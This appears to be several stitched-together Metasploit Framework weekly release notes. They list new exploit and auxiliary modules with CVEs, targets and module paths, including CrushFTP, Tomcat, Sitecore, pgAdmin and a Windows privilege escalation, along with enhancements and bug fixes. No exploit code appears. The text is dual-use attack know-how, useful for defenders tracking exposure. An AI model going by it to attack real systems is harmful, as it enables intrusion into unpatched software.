Description: Adds an auxiliary module leveraging CVE-2025-2825, an authentication bypass in CrushFTP 11 < 11.3.1 and 10 < 10.8.4, to obtain working session cookies for the target user account.

Appsmith RCE

Authors: Takahiro Yokoyama and Whit Taylor (Rhino Security Labs)
Type: Exploit
Pull request: #20007 contributed by Takahiro-Yoko
Path: linux/http/appsmith_rce_cve_2024_55964
AttackerKB reference: CVE-2024-55964

Description: This module adds an exploit for CVE-2024-55964, a misconfigured PostgreSQL instance in Appsmith, which can lead to remote code execution (RCE).

Pandora FMS authenticated command injection leading to RCE via chromium_path or phantomjs_bin

Author: h00die-gr3y(https://github.com/h00die-gr3y)
Type: Exploit
Pull request: #20008 contributed by h00die-gr3y
Path: linux/http/pandora_fms_auth_rce_cve_2024_12971
AttackerKB reference: CVE-2024-12971

Description: Module for CVE-2024-12971, command injection in directory settings for PandoraFMS. The module requires admin credentials, but if MySQL with default credentials is exposed, the module creates a new admin profile.

Oracle Access Manager unauthenticated Remote Code Execution

Authors: Jang, Peterjson, Y4er, and sfewer-r7
Type: Exploit
Pull request: #19994 contributed by sfewer-r7
Path: multi/http/oracle_access_manager_rce_cve_2021_35587
AttackerKB reference: CVE-2021-35587

Description: This adds an exploit module for CVE-2021-35587, an unauthenticated deserialization vulnerability affecting Oracle Access Manager (OAM).

pgAdmin Query Tool authenticated RCE (CVE-2025-2945)

Authors: jheysel-r7 and pyozzi-toss
Type: Exploit
Pull request: #20018 contributed by jheysel-r7
Path: multi/http/pgadmin_query_tool_authenticated
AttackerKB reference: CVE-2025-2945

Description: A new module for CVE-2025-2945, authenticated remote code execution in pgAdmin. The vulnerability lies within the Query Tool. For successful exploitation, an attacker needs a set of valid credentials for pgAdmin and credentials for the target database.

Enhancements and features (5)

• #20003 from zeroSteiner - Adds support for the LDAP protocol within RHOSTS, for example: use auxiliary/gather/ldap_query and run ldap://domain.local;Administrator:p4$$w0rd@192.168.123.13/dc=domain,dc=local action=ENUM_ACCOUNTS.
• #20006 from cgranleese-r7 - Adds additional metadata to the phpbb_highlight and ms10_061_spoolss modules.
• #20015 from adfoster-r7 - Metasploit will now no longer attempt to load external modules with unsupported runtimes as it caused crashes to occur. Now users are notified if they are required to install Go or Python3.
• #20019 from adfoster-r7 - Improves metadata and enhances the APIs for extracting HTTP compatible login scanners.
• #20024 from cgranleese-r7 - Adds a new sslkeylogfile datastore option to HTTP modules to support decrypting SSL/TLS network traffic.

Bugs fixed (1)

• #20013 from sjanusz-r7 - Fixes a crash when using the module search cache with an integer.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.56...6.4.57
• Full diff 6.4.56...6.4.57

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

New RCEs

Metasploit added four new modules this week, including three that leverage vulnerabilities to obtain remote code execution (RCE). Among these three, two leverage deserialization, showing that the exploit primitive is still going strong. The Tomcat vulnerability in particular CVE-2025-24813 garnered a lot of attention when it was disclosed; however, to function, the exploit requires specific conditions to be met, which may not be present in many environments.

AD CS / PKCS12 Improvements

With the popularity of exploiting AD CS misconfigurations over the past couple of years, Metasploit has been continuing to iterate over our support. This week saw two improvements; one added additional error handling, which notably calls out authorization errors more clearly to the user. These errors, now labeled no-access failures, are encountered when the user is successfully authenticated but lacks authorization privileges to enroll on either the certificate template or the certificate authority server. Additionally, Metasploit's support for PKCS12 certificate storage is actively being improved. This week, a milestone was reached allowing additional metadata to be stored with the certificate, which, in the future, will enable more streamlined use of stored certificate data. This new metadata includes the password to decrypt the PKCS12 data, the CA that issued the certificate and AD CS template it was derived from.

New module content (4)

pfSense Login Scanner

Author: sjanusz-r7
Type: Auxiliary
Pull request: #19985 contributed by sjanusz-r7
Path: scanner/http/pfsense_login

Description: This adds a login scanner module for pfSense which can be used to brute force valid credentials to the web GUI.

CmsMadeSimple Authenticated File Manager RCE

Authors: Mirabbas Ağalarov, Okan Kurtuluş, and tastyrice
Type: Exploit
Pull request: #19980 contributed by tastyrce
Path: multi/http/cmsms_file_manager_auth_rce
AttackerKB reference: CVE-2023-36969

Description: This adds an exploit module for CMSMadeSimple <= v2.2.21, which is vulnerable to an authenticated RCE (CVE-2023-36969).

Tomcat Partial PUT Java Deserialization

Authors: Calum Hutton, h4ck3r-04, and sw0rd1ight
Type: Exploit
Pull request: #19995 contributed by chutton-r7
Path: multi/http/tomcat_partial_put_deserialization
AttackerKB reference: CVE-2025-24813

Description: This adds an exploit module for CVE-2025-24813, which is an unauthenticated, constrained file write vulnerability in Apache Tomcat.

Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit

Authors: Dylan Pindur and machang-r7
Type: Exploit
Pull request: #19947 contributed by machang-r7
Path: windows/http/sitecore_xp_cve_2025_27218
AttackerKB reference: CVE-2025-27218

Description: This adds an exploit module for CVE-2025-27217, an unauthenticated .NET deserialization vulnerability for Sitecore.

Enhancements and features (4)

• #19606 from cgranleese-r7 - This updates the LDAP modules to use datastore options for authentication that are prefixed with LDAP, allowing them to be used as larger workflows that merge datastore options for multiple protocols.
• #19736 from cdelafuente-r7 - This update adds support for the new Pkcs12 data format, allowing the CA and ADCS template to be stored as metadata in the database. Additionally, Pkcs12 passwords can now be stored as metadata, with validation ensuring correct passwords are provided when adding encrypted Pkcs12 files using the creds command.
• #19984 from zeroSteiner - This improves AD CS workflows by adding additional error handing.
• #19991 from zeroSteiner - This adds some new tests for LoginScanners. It ensures that the LoginScanners follow a common interface for initialization, most notably that they take a single argument containing the configuration as a hash.

Bugs fixed (3)

• #19934 from sfewer-r7 - This addresses several bugs in the exploit/linux/misc/cisco_ios_xe_rce module, which was failing for Cisco IOS XE version 17.06.05 on C8000v series appliances. Fixes include correcting the /webui URI to /webui/ (with a trailing slash) and adjusting the case sensitivity in the /webui_wsma_https URI for both CSR1000v and C8000v appliances. Additionally, the module now properly distinguishes between HTTPS and HTTP targets, ensuring compatibility with both appliance series.
• #19993 from h00die-gr3y - This fixes an issue where payloads using cmd/base64 encoder with badchars \x20 (space) failed due to syntax errors in POSIX shells when ${IFS} followed parentheses. Removed unnecessary spaces from the payload to ensure proper execution in Unix-based environments.
• #19998 from sjanusz-r7 - Fixes a crash when running the auxiliary/crawler/msfcrawler module.

Documentation

• #19979 from bwatters-r7 - This adds documentation that describes when a module submission may be superseded.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.55...6.4.56
• Full diff 6.4.55...6.4.56

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Windows LPE - Cloud File Mini Filer Driver Heap Overflow

This Metasploit release includes an exploit module for CVE-2024-30085, an LPE in cldflt.sys which is known as the Windows Cloud Files Mini Filer Driver. This driver allows users to manage and sync files between a remote server and a local client. The exploit module allows users with an existing session on an affected Windows device to seamlessly escalate their privileges to NT AUTHORITY\SYSTEM. This module has been tested on Windows workstation versions 10_1809 through 11_23H2 and Windows server versions 2022 to 22_23H2.

New module content (3)

GLPI Inventory Plugin Unauthenticated Blind Boolean SQLi

Authors: jheysel-r7 and rz
Type: Auxiliary
Pull request: #19974 contributed by jheysel-r7
Path: gather/glpi_inventory_plugin_unauth_sqli
AttackerKB reference: CVE-2025-24799

Description: This adds an auxiliary module for an Unauth Blind Boolean SQLi (CVE-2025-24799) vulnerability in GLPI <= 1.0.18 when the Inventory Plugin is installed and enabled.

Eramba (up to 3.19.1) Authenticated Remote Code Execution Module

Authors: Niklas Rubel, Sergey Makarov, Stefan Pietsch, Trovent Security GmbH, and msutovsky-r7
Type: Exploit
Pull request: #19957 contributed by msutovsky-r7
Path: linux/http/eramba_rce
AttackerKB reference: CVE-2023-36255

Description: This adds an exploit for CVE-2023-36255 which is an authenticated command injection vulnerability in Eramba.

Windows Cloud File Mini Filer Driver Heap Overflow

Authors: Alex Birnberg, bwatters-r7, and ssd-disclosure
Type: Exploit
Pull request: #19802 contributed by bwatters-r7
Path: windows/local/cve_2024_30085_cloud_files
AttackerKB reference: CVE-2024-30085

Description: Local Privilege Escalation for Windows, exploiting CVE-2024-30085. It allows escalating an existing session to higher privileges.

Bugs fixed (3)

• #19932 from adfoster-r7 - Fixes a crash when running the exploits/windows/mssql/mssql_payload module against previously opened Microsoft SQL Server sessions.
• #19962 from e2002e - This preemptively updates the API host for the ZoomEye search module to reflect changes made by the upstream organization.
• #19987 from zeroSteiner - This updates the Ivanti and Sonicwall Bruteforce modules to use #initialize methods that accept a single argument as the LoginScanner classes should. It also renames the modules to follow the standard convention and adds a small fix to catch an unhandled connection error that was being thrown by the Sonicwall module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.54...6.4.55
• Full diff 6.4.54...6.4.55

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro